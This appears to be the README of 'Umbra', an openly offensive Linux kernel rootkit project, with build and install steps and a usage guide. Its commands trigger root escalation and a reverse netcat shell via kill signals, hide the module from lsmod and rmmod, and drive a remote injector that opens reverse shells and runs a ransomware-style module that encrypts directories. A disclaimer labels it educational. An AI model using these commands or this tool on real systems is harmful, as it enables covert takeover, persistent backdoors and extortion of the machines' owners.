Home

Awesome

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra <img src="images/umbraicon2.png" float="right" width = 50>

Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more.

The rootkit is still under development, although the features listed below are already fully operational.

Backdoor in action

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

Features

<img src="images/umbrainjectorwithmodules.png" width = 800/>

Ransom module in action

More functionalities will come in later updates.

Disclaimer

This rookit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is not intended to be used on a real scenario.

IMPORTANT: If you are going to test this rootkit in your own machine, I strongly recommend to use a VM.

About the Umbra Modules: The ransom module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I definitely do not recommend running this towards your root folder or similar unless on a controlled environment.

Table of Contents

  1. Build and Install
  2. Unloading Umbra
  3. Local Control
  4. Umbra Injector: Remote Control
  5. Umbra Modules
  6. References

Build and install

Remember that you should have a 4.x or 5.x kernel available.

  1. Download your kernel header files
apt install linux-headers-$(uname -r)
  1. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json for an example on which directories to include.

  2. Clone the project

git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Build Umbra
make
  1. Load Umbra in the kernel and configure environment The script will install Umbra in the kernel and configure a special directory where to store the malware modules. The directory will be later hidden by the rootkit.
sudo ./install.sh

If you have previously run the script and wish to just install Umbra in the kernel, you can run:

sudo insmod ./umbra.ko

Unloading Umbra

Make sure Umbra is not in invisible mode, otherwise this will fail.

sudo rmmod umbra

Basic Usage: Local control

Change current user privileges to root

kill -50 1

Start reverse netcat shell to IP:PORT

nc -lvp 5888
kill -51 1
<img src="images/kill51screenshot.png" width = 800/>

Note: Umbra also tries to start the reverse shell on load.

Hide the rootkit - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

kill -52 1

Unhide the rootkit

This reverts the invisible mode if active.

kill -53 1

Umbra Injector: Remote control

Get reverse shell via backdoor

The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.

./injector -S 127.0.0.1

The backdoor listens for packets with the following payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

You can also build your own injector using my library RawTCP.

Hide the rootkit remotely - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

./injector -i 127.0.0.1

Unhide the rootkit remotely

This reverts the invisible mode if active.

./injector -u 127.0.0.1

Help

You can see the full information on how to run the Umbra Injector by:

./injector -h

Umbra Modules

The Umbra Modules will be stored by the install.sh script on /tmp/umbra, where Umbra will hide them. The directory will not visible by commands such as ls or similar.

Ransom module

This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the .ubr extension.

Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.

Encrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Decrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used: How to create LKMs:

Linux syscall reference:

Some rootkit references:

License

This project is licensed under the GPLv2 license. See LICENSE